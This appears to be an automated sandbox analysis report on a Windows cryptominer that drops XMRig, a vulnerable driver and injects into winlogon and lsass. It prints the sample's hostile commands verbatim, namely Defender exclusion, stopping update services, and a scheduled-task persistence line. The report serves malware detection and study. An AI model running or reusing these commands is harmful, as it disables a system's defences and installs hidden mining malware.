                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPEMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                        Source: 31.2.dxpserver.exe.7ff652f15b40.6.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                        Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPEMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
                        Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                        Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                        Source: 31.2.dxpserver.exe.7ff652aa0000.4.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                        Source: 0000001F.00000002.617274824.00007FF652E22000.00000004.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                        Source: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys, type: DROPPEDMatched rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                        Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                        Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.hJump to behavior
                        Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.hJump to behavior
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD14E4
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD2328
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD1DB4
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD26E8
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5A5F2F8
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5A61658
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5A5B23C
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5A520DC
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5A5B030
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BBFEF8
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BC2258
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BBBE3C
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BB2CDC
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BBBC30
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BEF2F8
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BF1658
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BEB23C
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BE20DC
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BEB030
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C1FEF8
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C1BE3C
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C22258
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C12CDC
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C1BC30
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C00F2F8
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C00B030
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C0020DC
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C00B23C
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C011658
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C03FEF8
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C03BC30
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C032CDC
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C03BE3C
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C042258
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,FindCloseChangeNotification,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BB2A7C NtEnumerateValueKey,NtEnumerateValueKey,
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C0321CC NtQuerySystemInformation,StrCmpNIW,
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to behavior
                        Source: file.exeStatic PE information: invalid certificate
                        Source: file.exeStatic PE information: Number of sections : 11 > 10
                        Source: dxpserver.exe.0.drStatic PE information: Number of sections : 11 > 10
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp 78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                        Source: file.exeReversingLabs: Detection: 40%
                        Source: file.exeVirustotal: Detection: 35%
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; }
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\lsass.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; }
                        Source: C:\Users\user\Desktop\file.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@44/68@0/0
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD1AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3572:120:WilError_01
                        Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3952:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_01
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,
                        Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
                        Source: file.exeStatic file information: File size 10264640 > 1048576
                        Source: file.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x9a2800
                        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5A622B8 push rdx; retf
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5A684FD push rcx; retf 003Fh
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BC94FD push rcx; retf 003Fh
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BC3130 push rax; ret
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BF22B8 push rdx; retf
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BF84FD push rcx; retf 003Fh
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C23130 push rax; ret
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C294FD push rcx; retf 003Fh
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C0184FD push rcx; retf 003Fh
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C0122B8 push rdx; retf
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C0494FD push rcx; retf 003Fh
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C043130 push rax; ret
                        Source: file.exeStatic PE information: section name: .xdata
                        Source: dxpserver.exe.0.drStatic PE information: section name: .xdata
                        Source: bjmgommvilsr.tmp.0.drStatic PE information: section name: _RANDOMX
                        Source: bjmgommvilsr.tmp.0.drStatic PE information: section name: _TEXT_CN
                        Source: bjmgommvilsr.tmp.0.drStatic PE information: section name: _TEXT_CN
                        Source: bjmgommvilsr.tmp.0.drStatic PE information: section name: _RDATA
                        Source: file.exeStatic PE information: real checksum: 0x9cc924 should be: 0x9d033f
                        Source: bjmgommvilsr.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x554c2a
                        Source: dxpserver.exe.0.drStatic PE information: real checksum: 0x9cc924 should be: 0x9d033f

                        Persistence and Installation Behavior

                        barindex
                        Source: Yara matchFile source: 00000017.00000003.708438407.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.585943996.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.772856939.000001FDE6010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.562936177.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.770922577.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.679943242.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.650224694.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file

                        Boot Survival

                        barindex
                        Source: Yara matchFile source: 00000017.00000003.708438407.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.585943996.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.772856939.000001FDE6010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.562936177.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.770922577.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.679943242.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.650224694.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\lsass.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\SecureTimeLimitsJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                        Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                        Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x93 0x33 0x35 0x5D 0xDF
                        Source: C:\Users\user\Desktop\file.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BJMGOMMVILSR.TMP
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BJMGOMMVILSR.TMP
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BJMGOMMVILSR.TMP
                        Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
